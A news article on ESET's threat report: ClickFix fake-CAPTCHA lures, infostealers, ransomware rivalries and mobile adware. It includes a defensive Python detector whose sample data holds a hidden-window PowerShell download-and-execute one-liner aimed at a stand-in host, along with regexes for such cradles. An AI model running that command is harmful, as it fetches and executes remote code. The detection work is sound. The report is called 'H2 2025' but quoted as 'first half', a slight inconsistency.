In a striking development within the cybersecurity landscape, the ClickFix attack vector has surged by an astonishing 517% since the latter half of 2024, positioning itself as the second most exploited method for cyberattacks, trailing only behind phishing. This alarming trend is detailed in ESET’s H2 2025 Threat Report, which highlights how hackers are leveraging ClickFix to deploy various infostealing malware, including notorious variants such as Lumma Stealer, VidarStealer, StealC, and Danabot.
Understanding the ClickFix Mechanism
The ClickFix attack relies on a deceptive mechanism: a counterfeit reCAPTCHA check lures unsuspecting users into running code in a PowerShell terminal. Victims are misled into believing they are resolving a fictitious error by following a few simple steps, and those steps end in the execution of complex, harmful scripts. Many users, focused on fixing the supposed issue, never consider what the commands they are running actually do.
Typically, ClickFix is disseminated via phishing emails that direct users to fraudulent websites demanding reCAPTCHA verification before access is granted. Because the resulting PowerShell commands frequently evade antivirus detection, the method is particularly effective for cybercriminals, who manipulate users into unwittingly compromising their own devices.
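Since the lure depends on the user launching PowerShell by hand, process-creation telemetry gives defenders a detection point. The script below is an added example, not code from ESET's report or from any product: it scores constructed Sysmon-style process-creation records (the field names, the scoring weights and the threshold are assumptions to tune) for the combination that characterises a pasted lure: an interpreter started from the user's own shell, a download-and-execute cmdlet, a hidden window or encoded command, and a URL.

```python
import re

# Constructed process-creation records in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr http://captcha-check.invalid/v.ps1)"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "pwsh -NoExit -c Get-Date"},
]

INTERPRETERS = {"powershell.exe", "pwsh.exe"}
USER_LAUNCHERS = {"explorer.exe"}   # Run dialog / Start menu launch by the user
FLAG_THRESHOLD = 3                  # assumed tuning value, adjust to your environment

# Patterns typical of pasted download-and-execute one-liners
CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring)\b", re.I)
HIDE_OR_ENCODE = re.compile(r"-(w|windowstyle)\s+hidden|-(e|ec|enc|encodedcommand)\b", re.I)
URL = re.compile(r"https?://", re.I)

def basename(path):
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def clickfix_score(event):
    """Score one record; higher means more ClickFix-like. Returns (score, reasons)."""
    score, reasons = 0, []
    cmd = event["command_line"]
    if basename(event["image"]) in INTERPRETERS and basename(event["parent_image"]) in USER_LAUNCHERS:
        score += 2
        reasons.append("interpreter launched interactively by the user")
    if CRADLE.search(cmd):
        score += 2
        reasons.append("download-and-execute cmdlet in command line")
    if HIDE_OR_ENCODE.search(cmd):
        score += 1
        reasons.append("hidden window or encoded command")
    if URL.search(cmd):
        score += 1
        reasons.append("URL in command line")
    return score, reasons

def scan(events):
    """Return the records whose score meets the threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = clickfix_score(ev)
        if score >= FLAG_THRESHOLD:
            hits.append({"command_line": ev["command_line"], "score": score, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"[{hit['score']}] {hit['command_line']}\n    " + "; ".join(hit["reasons"]))
```

Only the first record is flagged; the scheduled backup script started from cmd.exe and the interactive `Get-Date` session score below the threshold, which is the false-positive behaviour a rule like this needs.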
Rising Threats in Infostealers
In related infostealer news, ESET’s Threat Report reveals that SnakeStealer has now surpassed Agent Tesla as the most frequently detected infostealer. SnakeStealer has been implicated in a significant campaign targeting numerous businesses across the US and EU, with the primary objective of credential theft.
Meanwhile, the ransomware landscape has experienced a period of unexpected turmoil, largely attributed to internal conflicts and rivalries among various ransomware groups. The DragonForce group has notably initiated a series of defacement campaigns against prominent ransomware entities, including BlackLock, Mamona, and the ransomware-as-a-service powerhouse, RansomHub. Despite recent law enforcement actions aimed at dismantling ransomware operations, such as the seizure of 8base, it appears that these internal rivalries have inflicted considerable damage on the overall ransomware ecosystem.
Mobile Malware Trends
On the mobile front, the emergence of Kaleidoscope infections has led to a staggering 160% increase in Android adware detections. The distribution of malware through official app stores is not a novel occurrence; however, the recent SparkKitty malware has been found circulating through both the Apple App Store and Google Play Store. Kaleidoscope employs a dual-pronged attack strategy, generating advertising revenue through intrusive ads while simultaneously infecting devices with a malicious twin app sourced from third-party app stores.
“From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring,” remarked Jiří Kropáč, ESET Director of Threat Prevention Labs. This statement encapsulates the dynamic and evolving nature of cybersecurity challenges that businesses must navigate in the current environment.